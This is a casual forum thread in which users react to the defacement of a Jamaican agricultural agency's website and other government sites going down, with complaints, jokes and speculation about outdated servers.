I was just gonna ask what the hell you talking bout then i realize that noscript disable the hacked by Pop crap

idiot thing that.......

Reported to them thru email already, hope they get it back up

oh well let's see what will happen

heights of almshouse!!!

pops is an ***, i hope is ego is massaged by sabotaging rada's and i stress RADA's website.

I was just gonna ask what the hell you talking bout then i realize that noscript disable the hacked by Pop crap

Firefox + Noscript (and ABP and Platypus) FTW!

Same here. At least he (she :eusa_shif?) didn't destroy anything. Well hopefully not :eusa_pray.

He could have sent them an email regarding the site security. Poor RADA, trying to help farmers, most of who don't have access to Internet.

WHY????????????????????

POPS want a kick.

.................................................. ....................

Now which Idiot hacked this site for what purpose?

http://www.rada.gov.jm/rada_library.php

Now I need infor and cannot get it....Idle people seriously

how you find out sey it hacked?:eusa_thin

how you find out sey it hacked?:eusa_thin

I am doing farming, information is contained on the online library service for RADA that i want to get...its called SURFING THE WEB...

He could have sent them an email regarding the site security. Poor RADA, trying to help farmers, most of who don't have access to Internet.

WHY????????????????????

POPS want a kick.

Not condoning what he did, but would they've fixed it if he had sent them an email?

I am doing farming, information is contained on the online library service for RADA that i want to get...its called SURFING THE WEB...

lol......DWL... ..

Woi... Anyways.

Hey, I was think that maybe we can do an Agriculture related site, seeing that the region needs it at the moment what say you?

.................................................. ....................

LOL thats funny. I mean who hacks an agricultural website?

LOL thats funny. I mean who hacks an agricultural website?Who cares what the website is about? It's a government website, somebody might care about it, so hack it. Another website hacked, and it goes on your resume.

Some of these sites are probably run on NT4 servers. I came across one once and was wondering why they were exposing that OS to the internet.

Some of these sites are probably run on NT4 servers. I came across one once and was wondering why they were exposing that OS to the internet.

lol this cannot be true ... Windows NT:D

So, the 2 sites I need access to tonight are down;
http://www.mns.org.jm/ Min of National Security
http://www.jcf.gov.jm/ JCF

http://img707.imageshack.us/img707/5286/mns.png (http://img707.imageshack.us/i/mns.png/)

You guys need to come together, register a company and start handing out flyers / placing an ad in the paper / email the website@hackedjamaicancompanyoftheday.jm advertising Security Solutions / server hardening / server maintenance... whatever...